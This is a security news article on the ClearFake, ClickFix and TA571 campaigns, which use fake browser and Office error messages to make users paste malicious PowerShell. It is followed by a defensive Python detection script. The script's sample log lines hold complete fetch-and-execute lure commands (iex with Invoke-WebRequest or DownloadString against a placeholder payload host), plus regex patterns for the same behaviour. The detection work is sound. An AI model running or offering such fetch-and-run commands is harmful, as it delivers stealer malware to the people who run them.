
Cybercriminals Exploit Chrome and Word Errors to Distribute Malware via PowerShell Scripts

The threat actors employ JavaScript within HTML attachments and hijacked websites to generate fake error notifications.


Security experts have uncovered a novel malware operation that leverages deceptive error alerts from Google Chrome, Microsoft Word, and OneDrive to persuade users to execute malicious PowerShell scripts. This operation involves multiple threat groups, including those behind ClearFake, ClickFix, and TA571, all known for disseminating extensive spam campaigns that usually culminate in malware infections.

Advanced Social Engineering Techniques

The threat actors employ JavaScript within HTML attachments and hijacked websites to generate fake error notifications. These alerts prompt users to copy a PowerShell “fix” command and execute it in a PowerShell prompt or via the Run dialog. The script flushes the DNS cache, clears clipboard data, displays a decoy message, and downloads another PowerShell script with anti-VM checks before fetching an info-stealer.

Proofpoint, a cybersecurity company, notes that despite requiring significant user action, the attackers' social engineering methods are sophisticated enough to convince users they are resolving legitimate issues.

ClearFake Campaign

Since April, the ClearFake operation has been hijacking authentic websites with harmful HTML and JavaScript. Victims visiting these sites are prompted to install a “root certificate” to properly view the website. They are instructed to copy a PowerShell script and manually run it on their systems.

The script performs several actions, such as flushing the DNS cache, erasing clipboard data, showing a decoy message, and downloading a remote PowerShell script. This script runs additional commands, including fetching an AES-encrypted PowerShell script that extracts and runs files from a ZIP archive. The ZIP archive hosts various legitimate executable files that side-load a trojanized DLL, subsequently activating Lumma Stealer.

ClickFix Campaign

Mid-April saw the ClickFix operation using compromised websites to display an iframe with a bogus alert about a browser update problem. Users were directed to open “Windows PowerShell (Admin)” and paste a provided code, executing a remote PowerShell script that fetched and ran Vidar Stealer, a malware that targets personal information and cryptocurrency wallet data within the compromised environment. The domain serving the payload was taken offline shortly after discovery, disrupting the campaign temporarily.

TA571 Campaign

TA571 was first observed utilizing this approach on 1 March 2024, sending over 100,000 messages to multiple organizations. The campaign used HTML attachments mimicking Microsoft Word documents, with error prompts urging users to execute PowerShell commands, leading to the installation of malware such as DarkGate and Matanbuchus.

On 27 May 2024, TA571 used HTML attachments mimicking OneDrive-hosted documents, directing users to execute PowerShell scripts, thereby installing DarkGate malware. The group has also been seen using the Run dialog instead of the PowerShell terminal, guiding users to run malicious scripts resulting in infections with DarkGate and NetSupport RAT.
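The common thread across the three campaigns is a user pasting a script into a PowerShell prompt or the Run dialog that flushes the DNS cache, clears the clipboard, shows a decoy message and then fetches a second stage. The following detection logic, added here as an illustration and not code from the article or from Proofpoint, scores process-creation events for exactly that combination: a PowerShell process whose command line mixes a download or in-memory execution cmdlet with the "cover" actions, with a higher severity when the parent is explorer.exe (which is what launches Run-dialog and Start-menu commands). The log line format, field names, domains and sample command lines are all constructed for the example.

```python
"""Score process-creation events for the copy-and-paste PowerShell lure.

Added example (not from the article). The pipe-separated key=value log
format, the INTERACTIVE_PARENTS assumption and every sample line below are
constructed; adapt the parser to your own Sysmon / 4688 export.
"""
import ntpath
import re
from dataclasses import dataclass

# Behaviours the article attributes to the pasted "fix" script, as regexes
# over the command line. Patterns are deliberately broad; tune to your estate.
INDICATORS = {
    "dns_flush": re.compile(r"flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard|\bclip(?:\.exe)?\b", re.I),
    "remote_download": re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|Net\.WebClient",
        re.I,
    ),
    "in_memory_exec": re.compile(r"\biex\b|Invoke-Expression", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe"}
# explorer.exe is the parent of Run-dialog (Win+R) and Start-menu launches,
# which is how the article says victims start the pasted command.
INTERACTIVE_PARENTS = {"explorer.exe"}


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' process-creation line."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"])


def matched_indicators(command_line: str) -> set[str]:
    """Names of every INDICATORS pattern found in the command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(command_line)}


def classify(ev: ProcEvent) -> str:
    """Return 'high', 'medium' or 'ok'.

    A fetch (download / in-memory execution) on its own is routine admin
    work; combined with the DNS-flush or clipboard-clear cover actions it
    matches the lure, and from an interactive parent it matches it exactly.
    """
    if ntpath.basename(ev.image).lower() not in SHELLS:
        return "ok"
    hits = matched_indicators(ev.command_line)
    fetches = bool(hits & {"remote_download", "in_memory_exec"})
    cover = bool(hits & {"dns_flush", "clipboard_clear"})
    if not (fetches and cover):
        return "ok"
    interactive = ntpath.basename(ev.parent_image).lower() in INTERACTIVE_PARENTS
    return "high" if interactive else "medium"


def scan(lines: list[str]) -> list[tuple[str, str]]:
    """Classify each log line; returns (verdict, command line) pairs."""
    return [(classify(ev), ev.command_line) for ev in map(parse_event, lines)]


# Constructed sample events (not real telemetry). Domains use .invalid.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LOG_LINES = [
    # 1: pasted lure from the Run dialog: cover actions + decoy + download
    rf"Image={PS}|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell.exe -Command "
    r'"ipconfig /flushdns; Set-Clipboard -Value $null; Write-Host Fixed; '
    r'iex (Invoke-WebRequest http://payload.example.invalid/fix.ps1).Content"',
    # 2: an admin flushing DNS from the Run dialog: benign
    rf"Image={PS}|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell.exe -Command ipconfig /flushdns",
    # 3: a scripted download with no cover actions: benign
    rf"Image={PS}|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=powershell.exe -Command "
    r"Invoke-WebRequest https://updates.example.invalid/agent.msi -OutFile C:\Temp\agent.msi",
    # 4: same lure pattern but launched from a batch file rather than interactively
    rf"Image={PS}|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=powershell.exe -c "
    r'"ipconfig /flushdns; iex (New-Object Net.WebClient).DownloadString(\"http://payload.example.invalid/stage2.ps1\")"',
]

if __name__ == "__main__":
    for verdict, cmd in scan(LOG_LINES):
        print(f"{verdict:6} {cmd[:80]}")
```

The split between a fetch and a cover action is what keeps the rule quiet on ordinary administration: flushing DNS alone, or downloading an installer alone, never alerts, while the article's sequence of flush, clear clipboard, decoy and download does. Because the victim types the command, the parent of PowerShell is explorer.exe or a console host rather than a document reader, so parent-process logic aimed at macro abuse will not see these events on its own.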

Markus Kasanmascheff
Markus is the founder of WinBuzzer and has been playing with Windows and technology for more than 25 years. He holds a Master's degree in International Economics and previously worked as Lead Windows Expert for Softonic.com.